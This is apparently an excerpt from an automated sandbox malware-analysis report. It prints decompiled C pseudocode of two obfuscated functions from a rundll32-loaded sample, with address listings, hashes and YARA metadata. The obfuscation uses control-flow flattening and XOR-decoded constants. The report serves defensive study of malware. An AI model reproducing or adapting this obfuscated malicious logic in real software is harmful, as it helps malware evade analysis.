                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Fo$M_o9$[K
                                                                                                                    • API String ID: 0-3743190696
                                                                                                                    • Opcode ID: 7d5a0227600bc21eef372dc0c5521c185b2a2fd5fb268aceacf48065997ad4d8
                                                                                                                    • Instruction ID: 9f957ff0c2a790d19bd3b89ea8bfc5f8c65ff4c852abdf689d619fb530c9f085
                                                                                                                    • Opcode Fuzzy Hash: 7d5a0227600bc21eef372dc0c5521c185b2a2fd5fb268aceacf48065997ad4d8
                                                                                                                    • Instruction Fuzzy Hash: BD120EB14093818FD369CF21C58AA9BBBF1FBC5748F10891DE5DA9A260D7B18909CF53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00339DCF Relevance: 4.1, Strings: 3, Instructions: 315COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E00339DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
				_v60 = 0x687dd9;
				_t370 = 0xc;
				_v60 = _v60 * 0x1d;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0xeb212648;
				_v84 = 0xd09924;
				_v84 = _v84 * 0x7c;
				_v84 = _v84 ^ 0x650614c5;
				_v100 = 0x3804f2;
				_v100 = _v100 | 0x9eb8052c;
				_v100 = _v100 ^ 0x9eb506d7;
				_v92 = 0xf492b0;
				_v92 = _v92 + 0xffffc4ae;
				_v92 = _v92 ^ 0x00fafa5e;
				_v16 = 0xd0e41e;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x000dc1c9;
				_v24 = 0x66d2fe;
				_v24 = _v24 / _t370;
				_v24 = _v24 + 0xffffccd2;
				_v24 = _v24 ^ 0x0a93dd72;
				_v24 = _v24 ^ 0x0a9c564f;
				_v72 = 0xbcf4e;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x000c8ddf;
				_t364 = _v72;
				_v68 = 0x4616df;
				_v68 = _v68 + 0x9c8e;
				_v68 = _v68 + 0xaaef;
				_v68 = _v68 ^ 0x004c065d;
				while(1) {
					L1:
					_t353 = 0x2e;
					L2:
					while(_t319 != 0x21229d9) {
						if(_t319 == 0x338c922) {
							_v136 = _t317;
							_t319 = 0x9035918;
							continue;
						}
						if(_t319 == 0x5b964d8) {
							__eflags = _v756 & _v44;
							if(__eflags == 0) {
								_t306 = _a16( &_v756,  &_v160);
								asm("sbb ecx, ecx");
								_t324 =  ~_t306 & 0x09c7cc54;
								L9:
								_t319 = _t324 + 0x21229d9;
								while(1) {
									L1:
									_t353 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v712 - _t353;
							if(_v712 != _t353) {
								L19:
								__eflags = _a24;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v116);
									_t312 = E0034DCF7(_v80, 0x3317a0, __eflags);
									_pop(_t327);
									E003347CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
									E00339DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
									_t310 = E0033A8B0(_v100, _t312, _v92);
									_t374 = _t374 + 0x3c;
									_t353 = 0x2e;
								}
								L18:
								_t319 = 0xbd9f62d;
								continue;
							}
							__eflags = _v710;
							if(__eflags == 0) {
								goto L18;
							}
							__eflags = _v710 - _t353;
							if(_v710 != _t353) {
								goto L19;
							}
							__eflags = _v708;
							if(__eflags != 0) {
								goto L19;
							}
							goto L18;
						}
						if(_t319 == 0x9035918) {
							_push(_v112);
							_push(_v88);
							E0033A918(_t317, __eflags, _v8, _v96, E0034DCF7(_v56, 0x331770, __eflags), _v124,  &_v1796);
							_t374 = _t374 + 0x1c;
							_t310 = E0033A8B0(_v120, _t307, _v32);
							_t319 = 0xb066d4a;
							while(1) {
								L1:
								_t353 = 0x2e;
								goto L2;
							}
						}
						if(_t319 == 0xb066d4a) {
							_t310 = E00337E00(_v108,  &_v756, _v76, _v48,  &_v1796);
							_t364 = _t310;
							_t374 = _t374 + 0xc;
							__eflags = _t310 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t310;
							}
							_t319 = 0x5b964d8;
							goto L1;
						}
						if(_t319 != 0xbd9f62d) {
							L24:
							__eflags = _t319 - 0xa89df2;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_t310 = E00334635(_v16,  &_v756, _t364, _v24);
						asm("sbb ecx, ecx");
						_t324 =  ~_t310 & 0x03a73aff;
						goto L9;
					}
					E00338ABF(_t364, _v72, _v68);
					_t319 = 0xa89df2;
					_t353 = 0x2e;
					goto L24;
				}
			}


























































                                                                                                                    0x00339dd9
                                                                                                                    0x00339dde
                                                                                                                    0x00339de1
                                                                                                                    0x00339de4
                                                                                                                    0x00339de7
                                                                                                                    0x00339de8
                                                                                                                    0x00339deb
                                                                                                                    0x00339dee
                                                                                                                    0x00339def
                                                                                                                    0x00339df0
                                                                                                                    0x00339df5
                                                                                                                    0x00339dfc
                                                                                                                    0x00339dff
                                                                                                                    0x00339e08
                                                                                                                    0x00339e0f
                                                                                                                    0x00339e14
                                                                                                                    0x00339e1b
                                                                                                                    0x00339e22
                                                                                                                    0x00339e25
                                                                                                                    0x00339e2c
                                                                                                                    0x00339e33
                                                                                                                    0x00339e3f
                                                                                                                    0x00339e44
                                                                                                                    0x00339e49
                                                                                                                    0x00339e50
                                                                                                                    0x00339e57
                                                                                                                    0x00339e5e
                                                                                                                    0x00339e65
                                                                                                                    0x00339e70
                                                                                                                    0x00339e71
                                                                                                                    0x00339e74
                                                                                                                    0x00339e7f
                                                                                                                    0x00339e82
                                                                                                                    0x00339e89
                                                                                                                    0x00339e90
                                                                                                                    0x00339e97
                                                                                                                    0x00339e9e
                                                                                                                    0x00339ea9
                                                                                                                    0x00339eac
                                                                                                                    0x00339eb3
                                                                                                                    0x00339eba
                                                                                                                    0x00339ebe
                                                                                                                    0x00339ec5
                                                                                                                    0x00339ed1
                                                                                                                    0x00339ed8
                                                                                                                    0x00339edb
                                                                                                                    0x00339ee2
                                                                                                                    0x00339ee9
                                                                                                                    0x00339ef0
                                                                                                                    0x00339ef7
                                                                                                                    0x00339efe
                                                                                                                    0x00339f02
                                                                                                                    0x00339f09
                                                                                                                    0x00339f10
                                                                                                                    0x00339f17
                                                                                                                    0x00339f1e
                                                                                                                    0x00339f25
                                                                                                                    0x00339f2c
                                                                                                                    0x00339f33
                                                                                                                    0x00339f3a
                                                                                                                    0x00339f41
                                                                                                                    0x00339f48
                                                                                                                    0x00339f4f
                                                                                                                    0x00339f56
                                                                                                                    0x00339f5d
                                                                                                                    0x00339f64
                                                                                                                    0x00339f6b
                                                                                                                    0x00339f71
                                                                                                                    0x00339f78
                                                                                                                    0x00339f7f
                                                                                                                    0x00339f86
                                                                                                                    0x00339f92
                                                                                                                    0x00339f97
                                                                                                                    0x00339f9c
                                                                                                                    0x00339fa3
                                                                                                                    0x00339faa
                                                                                                                    0x00339fb1
                                                                                                                    0x00339fbc
                                                                                                                    0x00339fbf
                                                                                                                    0x00339fc2
                                                                                                                    0x00339fc9
                                                                                                                    0x00339fd0
                                                                                                                    0x00339fde
                                                                                                                    0x00339fe1
                                                                                                                    0x00339fe8
                                                                                                                    0x00339fef
                                                                                                                    0x00339ffa
                                                                                                                    0x00339ffd
                                                                                                                    0x0033a000
                                                                                                                    0x0033a007
                                                                                                                    0x0033a00e
                                                                                                                    0x0033a012
                                                                                                                    0x0033a019
                                                                                                                    0x0033a01c
                                                                                                                    0x0033a023
                                                                                                                    0x0033a02e
                                                                                                                    0x0033a038
                                                                                                                    0x0033a03b
                                                                                                                    0x0033a03f
                                                                                                                    0x0033a046
                                                                                                                    0x0033a051
                                                                                                                    0x0033a052
                                                                                                                    0x0033a055
                                                                                                                    0x0033a059
                                                                                                                    0x0033a060
                                                                                                                    0x0033a06b
                                                                                                                    0x0033a06e
                                                                                                                    0x0033a075
                                                                                                                    0x0033a07c
                                                                                                                    0x0033a083
                                                                                                                    0x0033a08a
                                                                                                                    0x0033a091
                                                                                                                    0x0033a098
                                                                                                                    0x0033a09f
                                                                                                                    0x0033a0aa
                                                                                                                    0x0033a0ad
                                                                                                                    0x0033a0b1
                                                                                                                    0x0033a0b5
                                                                                                                    0x0033a0bc
                                                                                                                    0x0033a0c8
                                                                                                                    0x0033a0cb
                                                                                                                    0x0033a0d2
                                                                                                                    0x0033a0d9
                                                                                                                    0x0033a0e0
                                                                                                                    0x0033a0e7
                                                                                                                    0x0033a0eb
                                                                                                                    0x0033a0f2
                                                                                                                    0x0033a0f5
                                                                                                                    0x0033a0fc
                                                                                                                    0x0033a103
                                                                                                                    0x0033a10a
                                                                                                                    0x0033a111
                                                                                                                    0x0033a111
                                                                                                                    0x0033a113
                                                                                                                    0x00000000
                                                                                                                    0x0033a114
                                                                                                                    0x0033a126
                                                                                                                    0x0033a2d3
                                                                                                                    0x0033a2d9
                                                                                                                    0x00000000
                                                                                                                    0x0033a2d9
                                                                                                                    0x0033a132
                                                                                                                    0x0033a1fa
                                                                                                                    0x0033a200
                                                                                                                    0x0033a2bf
                                                                                                                    0x0033a2c6
                                                                                                                    0x0033a2c8
                                                                                                                    0x0033a174
                                                                                                                    0x0033a174
                                                                                                                    0x0033a111
                                                                                                                    0x0033a111
                                                                                                                    0x0033a113
                                                                                                                    0x00000000
                                                                                                                    0x0033a113
                                                                                                                    0x0033a111
                                                                                                                    0x0033a206
                                                                                                                    0x0033a20d
                                                                                                                    0x0033a236
                                                                                                                    0x0033a236
                                                                                                                    0x0033a23a
                                                                                                                    0x0033a23c
                                                                                                                    0x0033a244
                                                                                                                    0x0033a24a
                                                                                                                    0x0033a250
                                                                                                                    0x0033a273
                                                                                                                    0x0033a294
                                                                                                                    0x0033a2a1
                                                                                                                    0x0033a2a6
                                                                                                                    0x0033a2ab
                                                                                                                    0x0033a2ab
                                                                                                                    0x0033a22c
                                                                                                                    0x0033a22c
                                                                                                                    0x00000000
                                                                                                                    0x0033a22c
                                                                                                                    0x0033a20f
                                                                                                                    0x0033a217
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a219
                                                                                                                    0x0033a220
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a222
                                                                                                                    0x0033a22a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a22a
                                                                                                                    0x0033a13e
                                                                                                                    0x0033a1af
                                                                                                                    0x0033a1b7
                                                                                                                    0x0033a1d7
                                                                                                                    0x0033a1dc
                                                                                                                    0x0033a1e7
                                                                                                                    0x0033a1ed
                                                                                                                    0x0033a111
                                                                                                                    0x0033a111
                                                                                                                    0x0033a113
                                                                                                                    0x00000000
                                                                                                                    0x0033a113
                                                                                                                    0x0033a111
                                                                                                                    0x0033a146
                                                                                                                    0x0033a192
                                                                                                                    0x0033a197
                                                                                                                    0x0033a199
                                                                                                                    0x0033a19c
                                                                                                                    0x0033a19f
                                                                                                                    0x0033a30b
                                                                                                                    0x0033a30b
                                                                                                                    0x0033a30b
                                                                                                                    0x0033a1a5
                                                                                                                    0x00000000
                                                                                                                    0x0033a1a5
                                                                                                                    0x0033a14e
                                                                                                                    0x0033a2f9
                                                                                                                    0x0033a2f9
                                                                                                                    0x0033a2ff
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033a2ff
                                                                                                                    0x0033a161
                                                                                                                    0x0033a16c
                                                                                                                    0x0033a16e
                                                                                                                    0x00000000
                                                                                                                    0x0033a16e
                                                                                                                    0x0033a2eb
                                                                                                                    0x0033a2f3
                                                                                                                    0x0033a2f8
                                                                                                                    0x00000000
                                                                                                                    0x0033a2f8

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: H&!$Up7$yBd&
                                                                                                                    • API String ID: 0-2352930472
                                                                                                                    • Opcode ID: 70a0e0d0504b119bee09204204805b6ab0422330564dcef010dc90ea145dab60
                                                                                                                    • Instruction ID: 7f8dcda51cf4e9d0ddea20551c84f0bead8269bf6a65010432f494b7b1d68b7f
                                                                                                                    • Opcode Fuzzy Hash: 70a0e0d0504b119bee09204204805b6ab0422330564dcef010dc90ea145dab60
                                                                                                                    • Instruction Fuzzy Hash: 8AE165B1D0021DDBCF29DFE4D98A9EEBBB1FB44314F208159E516BA264D7B40A45CF41
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033B2C7 Relevance: 4.0, Strings: 3, Instructions: 235COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E0033B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E00337FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E00344B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E00346DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E0034D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E00340E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x353208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E00340B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E0033B74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E00341889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E00339714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E0033F09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E0033E5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E00333DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}





































                                                                                                                    0x0033b2d1
                                                                                                                    0x0033b2d8
                                                                                                                    0x0033b2d9
                                                                                                                    0x0033b2da
                                                                                                                    0x0033b2df
                                                                                                                    0x0033b2e7
                                                                                                                    0x0033b2f0
                                                                                                                    0x0033b2f2
                                                                                                                    0x0033b303
                                                                                                                    0x0033b308
                                                                                                                    0x0033b30e
                                                                                                                    0x0033b316
                                                                                                                    0x0033b31e
                                                                                                                    0x0033b326
                                                                                                                    0x0033b32e
                                                                                                                    0x0033b336
                                                                                                                    0x0033b33e
                                                                                                                    0x0033b346
                                                                                                                    0x0033b34e
                                                                                                                    0x0033b356
                                                                                                                    0x0033b35e
                                                                                                                    0x0033b366
                                                                                                                    0x0033b36e
                                                                                                                    0x0033b376
                                                                                                                    0x0033b37e
                                                                                                                    0x0033b386
                                                                                                                    0x0033b38b
                                                                                                                    0x0033b393
                                                                                                                    0x0033b39b
                                                                                                                    0x0033b3a7
                                                                                                                    0x0033b3ac
                                                                                                                    0x0033b3b2
                                                                                                                    0x0033b3ba
                                                                                                                    0x0033b3c7
                                                                                                                    0x0033b3ca
                                                                                                                    0x0033b3d6
                                                                                                                    0x0033b3df
                                                                                                                    0x0033b3e0
                                                                                                                    0x0033b3e4
                                                                                                                    0x0033b3ec
                                                                                                                    0x0033b3f4
                                                                                                                    0x0033b3fc
                                                                                                                    0x0033b401
                                                                                                                    0x0033b409
                                                                                                                    0x0033b411
                                                                                                                    0x0033b419
                                                                                                                    0x0033b421
                                                                                                                    0x0033b429
                                                                                                                    0x0033b431
                                                                                                                    0x0033b439
                                                                                                                    0x0033b441
                                                                                                                    0x0033b449
                                                                                                                    0x0033b457
                                                                                                                    0x0033b45b
                                                                                                                    0x0033b45f
                                                                                                                    0x0033b467
                                                                                                                    0x0033b46f
                                                                                                                    0x0033b477
                                                                                                                    0x0033b477
                                                                                                                    0x0033b47d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b483
                                                                                                                    0x0033b483
                                                                                                                    0x0033b56e
                                                                                                                    0x0033b56f
                                                                                                                    0x0033b572
                                                                                                                    0x0033b578
                                                                                                                    0x0033b57c
                                                                                                                    0x0033b57e
                                                                                                                    0x0033b520
                                                                                                                    0x0033b520
                                                                                                                    0x0033b525
                                                                                                                    0x0033b477
                                                                                                                    0x0033b477
                                                                                                                    0x0033b477
                                                                                                                    0x0033b47d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b47d
                                                                                                                    0x00000000
                                                                                                                    0x0033b6b6
                                                                                                                    0x0033b6b6
                                                                                                                    0x0033b6b6
                                                                                                                    0x0033b6c2
                                                                                                                    0x0033b6ce
                                                                                                                    0x0033b6ce
                                                                                                                    0x0033b584
                                                                                                                    0x0033b589
                                                                                                                    0x0033b590
                                                                                                                    0x0033b597
                                                                                                                    0x00000000
                                                                                                                    0x0033b597
                                                                                                                    0x0033b48f
                                                                                                                    0x0033b546
                                                                                                                    0x0033b54b
                                                                                                                    0x0033b55b
                                                                                                                    0x0033b4e6
                                                                                                                    0x0033b4e6
                                                                                                                    0x00000000
                                                                                                                    0x0033b4e6
                                                                                                                    0x0033b54d
                                                                                                                    0x00000000
                                                                                                                    0x0033b54d
                                                                                                                    0x0033b49b
                                                                                                                    0x0033b52a
                                                                                                                    0x0033b52f
                                                                                                                    0x0033b53f
                                                                                                                    0x00000000
                                                                                                                    0x0033b53f
                                                                                                                    0x0033b531
                                                                                                                    0x00000000
                                                                                                                    0x0033b531
                                                                                                                    0x0033b4a3
                                                                                                                    0x0033b510
                                                                                                                    0x0033b515
                                                                                                                    0x0033b518
                                                                                                                    0x0033b51a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b51a
                                                                                                                    0x0033b4ab
                                                                                                                    0x0033b4df
                                                                                                                    0x0033b4e4
                                                                                                                    0x0033b4ee
                                                                                                                    0x0033b4ee
                                                                                                                    0x00000000
                                                                                                                    0x0033b4e4
                                                                                                                    0x0033b4af
                                                                                                                    0x0033b4c8
                                                                                                                    0x0033b4ce
                                                                                                                    0x0033b4d5
                                                                                                                    0x0033b4d7
                                                                                                                    0x0033b4c4
                                                                                                                    0x0033b4c4
                                                                                                                    0x00000000
                                                                                                                    0x0033b4c4
                                                                                                                    0x0033b4b7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033b4bf
                                                                                                                    0x00000000
                                                                                                                    0x0033b59f
                                                                                                                    0x0033b59f
                                                                                                                    0x0033b5a5
                                                                                                                    0x0033b698
                                                                                                                    0x0033b69d
                                                                                                                    0x0033b6af
                                                                                                                    0x0033b6b4
                                                                                                                    0x00000000
                                                                                                                    0x0033b6b4
                                                                                                                    0x0033b69f
                                                                                                                    0x00000000
                                                                                                                    0x0033b69f
                                                                                                                    0x0033b5ab
                                                                                                                    0x0033b5b1
                                                                                                                    0x0033b679
                                                                                                                    0x0033b67e
                                                                                                                    0x0033b68e
                                                                                                                    0x00000000
                                                                                                                    0x0033b68e
                                                                                                                    0x0033b680
                                                                                                                    0x00000000
                                                                                                                    0x0033b680
                                                                                                                    0x0033b5b7
                                                                                                                    0x0033b5bd
                                                                                                                    0x0033b658
                                                                                                                    0x0033b65d
                                                                                                                    0x0033b66f
                                                                                                                    0x00000000
                                                                                                                    0x0033b66f
                                                                                                                    0x0033b65f
                                                                                                                    0x00000000
                                                                                                                    0x0033b65f
